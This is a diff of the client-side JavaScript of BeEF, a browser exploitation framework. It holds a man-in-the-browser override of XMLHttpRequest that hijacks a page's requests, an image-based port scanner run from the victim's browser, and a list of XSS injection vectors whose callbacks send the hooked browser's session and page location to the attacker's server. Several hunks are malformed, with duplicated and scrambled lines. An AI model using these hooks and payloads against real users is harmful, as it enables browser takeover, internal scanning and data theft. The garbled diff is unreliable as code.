 //   distributed under the License is distributed on an "AS IS" BASIS,
 //   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 //   See the License for the specific language governing permissions and
 //   limitations under the License.
 //
 /*!
 * @literal object: beef.logger
 *
@@ -59,6 +50,7 @@ beef.logger = {
 	 */
 	start: function() {
 		beef.browser.hookChildFrames();
 		this.running = true;
 		var d = new Date();
 		this.time = d.getTime();
--- a/core/main/client/mitb.js
+++ b/core/main/client/mitb.js
@@ -1,19 +1,10 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-//
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
-//   Licensed under the Apache License, Version 2.0 (the "License");
+// See the file 'doc/COPYING' for copying permission
 //   you may not use this file except in compliance with the License.
 //   You may obtain a copy of the License at
 //
 //       http://www.apache.org/licenses/LICENSE-2.0
 //
 //   Unless required by applicable law or agreed to in writing, software
 //   distributed under the License is distributed on an "AS IS" BASIS,
 //   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 //   See the License for the specific language governing permissions and
 //   limitations under the License.
 //
 beef.mitb = {
    cid:null,
@@ -23,47 +14,30 @@ beef.mitb = {
        beef.mitb.cid = cid;
        beef.mitb.curl = curl;
        /*Override open method to intercept ajax request*/
-        var xml_type;
+        var hook_file = "<%= @hook_file %>";
        if (window.XMLHttpRequest && !(window.ActiveXObject)) {
            xml_type = 'XMLHttpRequest';
        }
        if (xml_type == "XMLHttpRequest") {
            beef.mitb.sniff("Method XMLHttpRequest.open override");
            (function (open) {
-                XMLHttpRequest.prototype.open = function (method, url, async, user, pass) {
+                XMLHttpRequest.prototype.open = function (method, url, async, mitb_call) {
-
+                    // Ignore it and don't hijack it. It's either a request to BeEF (hook file or Dynamic Handler)
-                    var portRegex = new RegExp(":[0-9]+");
+                    // or a request initiated by the MiTB itself.
-                    var portR = portRegex.exec(url);
+                    if (mitb_call || (url.indexOf(hook_file) != -1 || url.indexOf("/dh?") != -1)) {
-                    /*return :port*/
+                        open.call(this, method, url, async, true);
-                    var requestPort;
+                    }else {
-
+                        var portRegex = new RegExp(":[0-9]+");
-                    if (portR != null) {
+                        var portR = portRegex.exec(url);
-                        requestPort = portR[0].split(":");
+                        var requestPort;
-                    }
+                        if (portR != null) { requestPort = portR[0].split(":")[1]; }
                    if ((user == "beef") && (pass == "beef")) {
                        /*a poisoned something*/
                        open.call(this, method, url, async, null, null);
                    }
                    else if (url.indexOf("hook.js") != -1 || url.indexOf("/dh?") != -1) {
                        /*a beef hook.js polling or dh */
                        open.call(this, method, url, async, null, null);
                    }
                    else {
                        //GET request
                        if (method == "GET") {
                            //GET request -> cross-domain
                            if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
                                beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
                                window.open(url);
-
+                            }else { //GET request -> same-domain
                            }
                            else {
                                beef.mitb.sniff("GET [Ajax Request]: " + url);
                                if (beef.mitb.fetch(url, document.getElementsByTagName("html")[0])) {
                                    var title = "";
@@ -72,26 +46,19 @@ beef.mitb = {
                                    } else {
                                        title = document.getElementsByTagName("title")[0].innerHTML;
                                    }
-                                    /*write the url of the page*/
+                                    // write the url of the page
                                    history.pushState({ Be:"EF" }, title, url);
                                }
                            }
-
+                        }else{
-                        }
+                            //POST request
-                        else {
+                            beef.mitb.sniff("POST ajax request to: " + url);
-                            /*if we are here we have an ajax post req*/
+                            open.call(this, method, url, async, true);
                            beef.mitb.sniff("Post ajax request to: " + url);
                            open.call(this, method, url, async, user, pass);
                        }
                    }
                };
            })(XMLHttpRequest.prototype.open);
        }
    },
    // Initializes the hook on anchors and forms.
@@ -170,7 +137,7 @@ beef.mitb = {
    fetchForm:function (url, query, target) {
        try {
            var y = new XMLHttpRequest();
-            y.open('POST', url, false, "beef", "beef");
+            y.open('POST', url, false, true);
            y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
            y.onreadystatechange = function () {
                if (y.readyState == 4 && y.responseText != "") {
@@ -190,14 +157,13 @@ beef.mitb = {
    fetch:function (url, target) {
        try {
            var y = new XMLHttpRequest();
-            y.open('GET', url, false, "beef", "beef");
+            y.open('GET', url, false, true);
            y.onreadystatechange = function () {
                if (y.readyState == 4 && y.responseText != "") {
                    target.innerHTML = y.responseText;
                    setTimeout(beef.mitb.hook, 10);
                }
-            }
+            };
            y.send(null);
            beef.mitb.sniff("GET: " + url);
            return true;
@@ -213,7 +179,7 @@ beef.mitb = {
        try {
            var target = document.getElementsByTagName("html")[0];
            var y = new XMLHttpRequest();
-            y.open('GET', url, false, "beef", "beef");
+            y.open('GET', url, false, true);
            y.onreadystatechange = function () {
                if (y.readyState == 4 && y.responseText != "") {
                    var title = "";
@@ -232,11 +198,9 @@ beef.mitb = {
            beef.mitb.sniff("GET: " + url);
        } catch (x) {
-
+            // the link is cross-domain, so load the resource in a different tab
            window.open(url);
            beef.mitb.sniff("GET [New Window]: " + url);
        }
    },
--- a/core/main/client/net.js
+++ b/core/main/client/net.js
@@ -1,35 +1,37 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-//
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
-//   Licensed under the Apache License, Version 2.0 (the "License");
+// See the file 'doc/COPYING' for copying permission
 //   you may not use this file except in compliance with the License.
 //   You may obtain a copy of the License at
 //
 //       http://www.apache.org/licenses/LICENSE-2.0
 //
 //   Unless required by applicable law or agreed to in writing, software
 //   distributed under the License is distributed on an "AS IS" BASIS,
 //   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 //   See the License for the specific language governing permissions and
 //   limitations under the License.
 //
 /*!
 * @literal object: beef.net
 *
- * Provides basic networking functions.
+ * Provides basic networking functions,
 * like beef.net.request and beef.net.forgeRequest,
 * used by BeEF command modules and the Requester extension,
 * as well as beef.net.send which is used to return commands
 * to BeEF server-side components.
 *
 * Also, it contains the core methods used by the XHR-polling
 * mechanism (flush, queue)
 */
 beef.net = {
    host:"<%= @beef_host %>",
    port:"<%= @beef_port %>",
    hook:"<%= @beef_hook %>",
    httpproto:"<%= @beef_proto %>",
    handler:'/dh',
    chop:500,
    pad:30, //this is the amount of padding for extra params such as pc, pid and sid
    sid_count:0,
    cmd_queue:[],
-    //Command object
+    /**
     * Command object. This represents the data to be sent back to BeEF,
     * using the beef.net.send() method.
     */
    command:function () {
        this.cid = null;
        this.results = null;
@@ -37,13 +39,17 @@ beef.net = {
        this.callback = null;
    },
-    //Packet object
+    /**
     * Packet object. A single chunk of data. X packets -> 1 stream
     */
    packet:function () {
        this.id = null;
        this.data = null;
    },
-    //Stream object
+    /**
     * Stream object. Contains X packets, which are command result chunks.
     */
    stream:function () {
        this.id = null;
        this.packets = [];
@@ -59,7 +65,8 @@ beef.net = {
    /**
     * Response Object - used in the beef.net.request callback
-     * Note: as we are using async mode, the response object will be empty if returned.Using sync mode, request obj fields will be populated.
+     * NOTE: as we are using async mode, the response object will be empty if returned.
     * Using sync mode, request obj fields will be populated.
     */
    response:function () {
        this.status_code = null;        // 500, 404, 200, 302
@@ -72,7 +79,13 @@ beef.net = {
        this.headers = null;            // full response headers
    },
-    //Queues the command, to be sent back to the framework on the next refresh
+    /**
     * Queues the specified command results.
     * @param: {String} handler: the server-side handler that will be called
     * @param: {Integer} cid: command id
     * @param: {String} results: the data to send
     * @param: {Function} callback: the function to call after execution
     */
    queue:function (handler, cid, results, callback) {
        if (typeof(handler) === 'string' && typeof(cid) === 'number' && (callback === undefined || typeof(callback) === 'function')) {
            var s = new beef.net.command();
@@ -84,26 +97,40 @@ beef.net = {
        }
    },
-    //Queues the current command and flushes the queue straight away
+    /**
     * Queues the current command results and flushes the queue straight away.
     * NOTE: Always send Browser Fingerprinting results
     * (beef.net.browser_details(); -> /init handler) using normal XHR-polling,
     * even if WebSockets are enabled.
     * @param: {String} handler: the server-side handler that will be called
     * @param: {Integer} cid: command id
     * @param: {String} results: the data to send
     * @param: {Function} callback: the function to call after execution
     */
    send:function (handler, cid, results, callback) {
-        if (typeof beef.websocket === "undefined") {
+        if (typeof beef.websocket === "undefined" || (handler === "/init" && cid == 0)) {
            this.queue(handler, cid, results, callback);
            this.flush();
-        }
+        }else {
        else {
            try {
                beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid +
                    '", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) +
                    '","callback": "' + callback + '","bh":"' + beef.session.get_hook_session_id() + '" }');
-            }
+            }catch (e) {
            catch (e) {
                this.queue(handler, cid, results, callback);
                this.flush();
-                }
+            }
        }
    },
-    //Flush all currently queued commands to the framework
+    /**
     * Flush all currently queued command results to the framework,
     * chopping the data in chunks ('chunk' method) which will be re-assembled
     * server-side by the network stack.
     * NOTE: currently 'flush' is used only with the default
     * XHR-polling mechanism. If WebSockets are used, the data is sent
     * back to BeEF straight away.
     */
    flush:function () {
        if (this.cmd_queue.length > 0) {
            var data = beef.encode.base64.encode(beef.encode.json.stringify(this.cmd_queue));
@@ -127,22 +154,30 @@ beef.net = {
        }
    },
-    //Split string into chunk lengths determined by amount
+    /**
     * Split the input data into chunk lengths determined by the amount parameter.
     * @param: {String} str: the input data
     * @param: {Integer} amount: chunk length
     */
    chunk:function (str, amount) {
        if (typeof amount == 'undefined') n = 2;
        return str.match(RegExp('.{1,' + amount + '}', 'g'));
    },
-    //Push packets to framework
+    /**
     * Push the input stream back to the BeEF server-side components.
     * It uses beef.net.request to send back the data.
     * @param: {Object} stream: the stream object to be sent back.
     */
    push:function (stream) {
        //need to implement wait feature here eventually
        for (var i = 0; i < stream.pc; i++) {
-            this.request(this.port == '443' ? 'https' : 'http', 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null);
+            this.request(this.httpproto, 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null);
        }
    },
    /**
-     *Performs http requests
+     * Performs http requests
     * @param: {String} scheme: HTTP or HTTPS
     * @param: {String} method: GET or POST
     * @param: {String} domain: bindshell.net, 192.168.3.4, etc
@@ -201,13 +236,12 @@ beef.net = {
            data:data,
            timeout:(timeout * 1000),
-            //needed otherwise jQuery always add Content-type: application/xml, even if data is populated
+            //This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated.
            beforeSend:function (xhr) {
                if (method == "POST") {
                    xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
                }
            },
            success:function (data, textStatus, xhr) {
                var end_time = new Date().getTime();
                response.status_code = xhr.status;
@@ -248,9 +282,11 @@ beef.net = {
    },
    /*
-     * Similar to this.request, except from a few things that are needed when dealing with forged requests:
+     * Similar to beef.net.request, except from a few things that are needed when dealing with forged requests:
     *  - requestid: needed on the callback
     *  - allowCrossDomain: set cross-domain requests as allowed or blocked
     *
     * forge_request is used mainly by the Requester and Tunneling Proxy Extensions.
     */
    forge_request:function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) {
@@ -293,14 +329,21 @@ beef.net = {
            return response;
        }
-        // build and execute the request
+        /*
-        if (method == "POST") {
+         * according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
         * This will turn POSTs into GETs for remote-domain requests.
         */
        if (method == "POST"){
            $j.ajaxSetup({
-                data:data
+                dataType: dataType
            });
        } else {
            $j.ajaxSetup({
                dataType: 'script'
            });
        }
-		// this is required for bugs in IE so data can be transfered back to the server
+		// this is required for bugs in IE so data can be transferred back to the server
        if ( beef.browser.isIE() ) {
            dataType = 'script'
        }
@@ -311,9 +354,7 @@ beef.net = {
            headers: headers,
            timeout: (timeout * 1000),
-            // needed otherwise jQuery always adds:
+            //This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated.
            // Content-type: application/xml
            // even if data is populated
            beforeSend:function (xhr) {
                if (method == "POST") {
                    xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
@@ -415,7 +456,9 @@ beef.net = {
        return false;
    },
-    //Sends back browser details to framework
+    /**
     * Sends back browser details to framework, calling beef.browser.getDetails()
     */
    browser_details:function () {
        var details = beef.browser.getDetails();
        details['HookSessionID'] = beef.session.get_hook_session_id();
--- a/core/main/client/net/cors.js
+++ b/core/main/client/net/cors.js
@@ -0,0 +1,77 @@
 beef.net.cors = {
  handler: "cors",
    /**
     * Response Object - used in the beef.net.request callback
     */
    response:function () {
        this.status  = null;      // 500, 404, 200, 302, etc
        this.headers = null;      // full response headers
        this.body    = null;      // full response body
    },
    /**
     * Make a cross-domain request using CORS
     *
     * @param method {String} HTTP verb ('GET', 'POST', 'DELETE', etc.)
     * @param url {String} url
     * @param data {String} request body
     * @param callback {Function} function to callback on completion
     */
    request: function(method, url, data, callback) {
    var xhr;
    var response = new this.response;
    if (XMLHttpRequest) {
        xhr = new XMLHttpRequest();
        if ('withCredentials' in xhr) {
            xhr.open(method, url, true);
            xhr.onerror = function() {
            };
            xhr.onreadystatechange = function() {
                if (xhr.readyState === 4) {
                    response.headers = this.getAllResponseHeaders()
                    response.body    = this.responseText;
                    response.status  = this.status;
                    if (!!callback) {
                        if (!!response) {
                            callback(response);
                        } else { 
                            callback('ERROR: No Response. CORS requests may be denied for this resource.')
                        }
                    }
                }
            };
            xhr.send(data);
        }
    } else if (typeof XDomainRequest != "undefined") {
        xhr = new XDomainRequest();
        xhr.open(method, url);
        xhr.onerror = function() {
        };
        xhr.onload = function() {
            response.headers = this.getAllResponseHeaders()
            response.body    = this.responseText;
            response.status  = this.status;
            if (!!callback) {
                if (!!response) {
                    callback(response);
                } else {
                    callback('ERROR: No Response. CORS requests may be denied for this resource.')
                }
            }
        };
        xhr.send(data);
    } else {
        if (!!callback) callback('ERROR: Not Supported. CORS is not supported by the browser. The request was not sent.');
    }
    }
 };
 beef.regCmp('beef.net.cors');
--- a/core/main/client/net/dns.js
+++ b/core/main/client/net/dns.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-//
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
-//   Licensed under the Apache License, Version 2.0 (the "License");
+// See the file 'doc/COPYING' for copying permission
 //   you may not use this file except in compliance with the License.
 //   You may obtain a copy of the License at
 //
 //       http://www.apache.org/licenses/LICENSE-2.0
 //
 //   Unless required by applicable law or agreed to in writing, software
 //   distributed under the License is distributed on an "AS IS" BASIS,
 //   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 //   See the License for the specific language governing permissions and
 //   limitations under the License.
 //
 /*!
 * @literal object: beef.net.dns
 * 
@@ -52,7 +43,7 @@ beef.net.dns = {
 		// sends a DNS request
 		sendQuery = function(query) {
-			//console.log("Requesting: "+query);
+			beef.debug("Requesting: "+query);
 			var img = new Image;
 			img.src = "http://"+query;
 			img.onload = function() { dom.removeChild(this); }
--- a/core/main/client/net/local.js
+++ b/core/main/client/net/local.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-//
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
-//   Licensed under the Apache License, Version 2.0 (the "License");
+// See the file 'doc/COPYING' for copying permission
 //   you may not use this file except in compliance with the License.
 //   You may obtain a copy of the License at
 //
 //       http://www.apache.org/licenses/LICENSE-2.0
 //
 //   Unless required by applicable law or agreed to in writing, software
 //   distributed under the License is distributed on an "AS IS" BASIS,
 //   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 //   See the License for the specific language governing permissions and
 //   limitations under the License.
 //
 /*!
 * @literal object: beef.net.local
 * 
--- a/core/main/client/net/portscanner.js
+++ b/core/main/client/net/portscanner.js
@@ -1,63 +1,54 @@
-//
+//
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-//
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
-//   Licensed under the Apache License, Version 2.0 (the "License");
+// See the file 'doc/COPYING' for copying permission
-//   you may not use this file except in compliance with the License.
+//
-//   You may obtain a copy of the License at
+
-//
+/*!
-//       http://www.apache.org/licenses/LICENSE-2.0
+ * @literal object: beef.net.portscanner
-//
+ * 
-//   Unless required by applicable law or agreed to in writing, software
+ * Provides port scanning functions for the zombie. A mod of pdp's scanner
-//   distributed under the License is distributed on an "AS IS" BASIS,
+ * 
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * Version: '0.1',
-//   See the License for the specific language governing permissions and
+ * author: 'Petko Petkov',
-//   limitations under the License.
+ * homepage: 'http://www.gnucitizen.org'
-//
+ */
-/*!
+
- * @literal object: beef.net.portscanner
+beef.net.portscanner = {
- * 
+
- * Provides port scanning functions for the zombie. A mod of pdp's scanner
+		scanPort: function(callback, target, port, timeout) 
- * 
+		{
- * Version: '0.1',
+			var timeout = (timeout == null)?100:timeout;
- * author: 'Petko Petkov',
+			var img = new Image();
- * homepage: 'http://www.gnucitizen.org'
+
- */
+			img.onerror = function () {
-
+				if (!img) return;
-beef.net.portscanner = {
+				img = undefined;
-
+				callback(target, port, 'open');
-		scanPort: function(callback, target, port, timeout) 
+			};
-		{
+
-			var timeout = (timeout == null)?100:timeout;
+			img.onload  = img.onerror;
-			var img = new Image();
+			
-
+			img.src = 'http://' + target + ':' + port;
-			img.onerror = function () {
+
-				if (!img) return;
+			setTimeout(function () {
-				img = undefined;
+				if (!img) return;
-				callback(target, port, 'open');
+				img = undefined;
-			};
+				callback(target, port, 'closed');
-
+			}, timeout);
-			img.onload  = img.onerror;
+
-			
+		},
-			img.src = 'http://' + target + ':' + port;
+
-
+		scanTarget: function(callback, target, ports_str, timeout)
-			setTimeout(function () {
+		{
-				if (!img) return;
+			var ports = ports_str.split(",");
-				img = undefined;
+
-				callback(target, port, 'closed');
+			for (index = 0; index < ports.length; index++) {
-			}, timeout);
+				this.scanPort(callback, target, ports[index], timeout);
-
+			};
-		},
+
-
+		}
-		scanTarget: function(callback, target, ports_str, timeout)
+};
-		{
+
-			var ports = ports_str.split(",");
+beef.regCmp('beef.net.portscanner');
-
+
 			for (index = 0; index < ports.length; index++) {
 				this.scanPort(callback, target, ports[index], timeout);
 			};
 		}
 };
 beef.regCmp('beef.net.portscanner');
--- a/core/main/client/net/requester.js
+++ b/core/main/client/net/requester.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-//
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
-//   Licensed under the Apache License, Version 2.0 (the "License");
+// See the file 'doc/COPYING' for copying permission
 //   you may not use this file except in compliance with the License.
 //   You may obtain a copy of the License at
 //
 //       http://www.apache.org/licenses/LICENSE-2.0
 //
 //   Unless required by applicable law or agreed to in writing, software
 //   distributed under the License is distributed on an "AS IS" BASIS,
 //   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 //   See the License for the specific language governing permissions and
 //   limitations under the License.
 //
 /*!
 * @literal object: beef.net.requester
 * 
--- a/core/main/client/net/xssrays.js
+++ b/core/main/client/net/xssrays.js
@@ -49,22 +49,20 @@ beef.net.xssrays = {
    //browser-specific attack vectors available strings: ALL, FF, IE, S, C, O
    vectors: [
-//				  {input:"',XSS,'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"\',XSS,\'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'",XSS,"', name: 'Standard DOM based injection double quote', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:'\'><script>XSS<\/script>', name: 'Standard script injection single quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'\'"><script>XSS<\/script>', name: 'Standard script injection', browser: 'ALL',url:true,form:true,path:true},
-				  {input:'"><script>XSS<\/script>', name: 'Standard script injection double quote', browser: 'ALL',url:true,form:true,path:true}, //,
+				  {input:'\'"><body onload="XSS">', name: 'body onload', browser: 'ALL',url:true,form:true,path:true},
 //				  {input:'\'><body onload=\'XSS\'>', name: 'body onload single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'"><body onload="XSS">', name: 'body onload double quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%27%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%22%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%25%32%37%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%%32%35%%33%32%%33%32%%32%35%%33%33%%34%35%%32%35%%33%33%%34%33%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35XSS%%32%35%%33%33%%34%33%%32%35%%33%32%%34%36%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35', name: 'double nibble url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true}
+				  {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true},
-//				  {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
  				  {input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
@@ -107,7 +105,7 @@ beef.net.xssrays = {
    // util function. Print string to the console only if the debug flag is on and the browser is not IE.
    printDebug:function(log) {
        if (this.debug && (!beef.browser.isIE6() && !beef.browser.isIE7() && !beef.browser.isIE8())) {
-            console.log("[XssRays] " + log);
+            beef.debug("[XssRays] " + log);
        }
    },
@@ -340,8 +338,8 @@ beef.net.xssrays = {
                        beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.poc = pocurl;
                        beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
-                        beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+                        beefCallback = "location='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
-                            + "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+                            + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
                        exploit = vector.input.replace(/XSS/g, beefCallback);
@@ -368,7 +366,7 @@ beef.net.xssrays = {
                beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
                beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
-                    + "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+                    + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
                exploit = vector.input.replace(/XSS/g, beefCallback);
@@ -424,7 +422,7 @@ beef.net.xssrays = {
                        beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
                        beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
-                            + "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+                            + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
                        exploit = beef.net.xssrays.escape(vector.input.replace(/XSS/g, beefCallback));
                        form += '<textarea name="' + i + '">' + exploit + '<\/textarea>';
--- a/core/main/client/os.js
+++ b/core/main/client/os.js
@@ -1,24 +1,15 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-//
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
-//   Licensed under the Apache License, Version 2.0 (the "License");
+// See the file 'doc/COPYING' for copying permission
 //   you may not use this file except in compliance with the License.
 //   You may obtain a copy of the License at
 //
 //       http://www.apache.org/licenses/LICENSE-2.0
 //
 //   Unless required by applicable law or agreed to in writing, software
 //   distributed under the License is distributed on an "AS IS" BASIS,
 //   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 //   See the License for the specific language governing permissions and
 //   limitations under the License.
 //
 beef.os = {
 	ua: navigator.userAgent,
-	
+
 	isWin311: function() {
-		return (this.ua.indexOf("Win16") != -1) ? true : false;
+		return (this.ua.match('(Win16)')) ? true : false;
 	},
 	isWinNT4: function() {
@@ -28,18 +19,25 @@ beef.os = {
 	isWin95: function() {
 		return (this.ua.match('(Windows 95)|(Win95)|(Windows_95)')) ? true : false;
 	},
 	isWinCE: function() {
 		return (this.ua.match('(Windows CE)')) ? true : false;
 	},
 	isWin98: function() {
 		return (this.ua.match('(Windows 98)|(Win98)')) ? true : false;
 	},
 	isWinME: function() {
-		return (this.ua.indexOf('Windows ME') != -1) ? true : false;
+		return (this.ua.match('(Windows ME)|(Win 9x 4.90)')) ? true : false;
 	},
 	isWin2000: function() {
 		return (this.ua.match('(Windows NT 5.0)|(Windows 2000)')) ? true : false;
 	},
 	isWin2000SP1: function() {
 		return (this.ua.match('Windows NT 5.01 ')) ? true : false;
 	},
 	isWinXP: function() {
 		return (this.ua.match('(Windows NT 5.1)|(Windows XP)')) ? true : false;
@@ -56,6 +54,10 @@ beef.os = {
 	isWin7: function() {
 		return (this.ua.match('(Windows NT 6.1)|(Windows NT 7.0)')) ? true : false;
 	},
 	isWin8: function() {
 		return (this.ua.match('(Windows NT 6.2)')) ? true : false;
 	},
 	isOpenBSD: function() {
 		return (this.ua.indexOf('OpenBSD') != -1) ? true : false;
@@ -72,7 +74,11 @@ beef.os = {
 	isMacintosh: function() {
 		return (this.ua.match('(Mac_PowerPC)|(Macintosh)|(MacIntel)')) ? true : false;
 	},
-	
+
 	isWinPhone: function() {
 		return (this.ua.match('(Windows Phone)')) ? true : false;
 	},
 	isIphone: function() {
 		return (this.ua.indexOf('iPhone') != -1) ? true : false;
 	},
@@ -97,6 +103,10 @@ beef.os = {
 		return (this.ua.match('BlackBerry')) ? true : false;
 	},
 	isWebOS: function() {
 		return (this.ua.match('webOS')) ? true : false;
 	},
 	isQNX: function() {
 		return (this.ua.match('QNX')) ? true : false;
 	},
@@ -104,19 +114,26 @@ beef.os = {
 	isBeOS: function() {
 		return (this.ua.match('BeOS')) ? true : false;
 	},
 	isWindows: function() {
 		return this.isWin311() || this.isWinNT4() || this.isWinCE() || this.isWin95() || this.isWin98() || this.isWinME() || this.isWin2000() || this.isWin2000SP1() || this.isWinXP() || this.isWinServer2003() || this.isWinVista() || this.isWin7() || this.isWin8() || this.isWinPhone();
 	},
 	getName: function() {
-		//windows
+		//Windows
-		if(this.isWin311()) return 'Windows 3.11';
